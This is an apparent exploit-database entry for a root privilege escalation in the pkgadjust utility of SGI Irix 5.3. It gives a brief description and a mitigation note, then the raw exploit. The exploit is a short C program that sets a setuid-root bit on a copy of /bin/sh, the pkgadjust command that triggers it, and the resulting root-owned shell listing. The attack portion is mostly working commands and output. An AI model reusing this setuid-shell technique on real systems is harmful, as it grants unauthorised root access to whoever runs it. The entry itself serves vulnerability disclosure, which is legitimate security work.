header-logo
Suggest Exploit
vendor:
Irix
by:
Unknown
7.5
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: Irix
Affected Version From: Irix 5.3
Affected Version To: Irix 5.3
Patch Exists: NO
Related CWE: Unknown
CPE: sgi:irix:5.3
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

pkgadjust utility vulnerability in Irix 5.3

The vulnerability in the pkgadjust utility allows an attacker to compromise the root account. By using a specially crafted program, the attacker can gain root privileges on the system.

Mitigation:

Upgrade to a patched version or apply vendor-supplied fix
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/419/info

A vulnerability exists in the pkgadjust utility shipped with Irix 5.3 from Silicon Graphics. This vulnerability can result in the compromise of the root account. 

% cat > getroot.c
int main() { setuid(0); chown("sh",0,0); chmod("sh",04755); return 0; }
% cc getroot.c -o getroot
% cp /bin/sh sh
% ls -la sh
-rwxr-xr-x 1 hhui user 140784 Jan 5 20:52 sh
% /usr/pkg/bin/pkgadjust -f -a getroot
scanning inst-database

updating pkginfo-files
........................................^C
% ls -la sh
-rwsr-xr-x 1 root sys 140784 Jan 5 20:52 sh

Navigation

Suggest Exploit

Services By CQR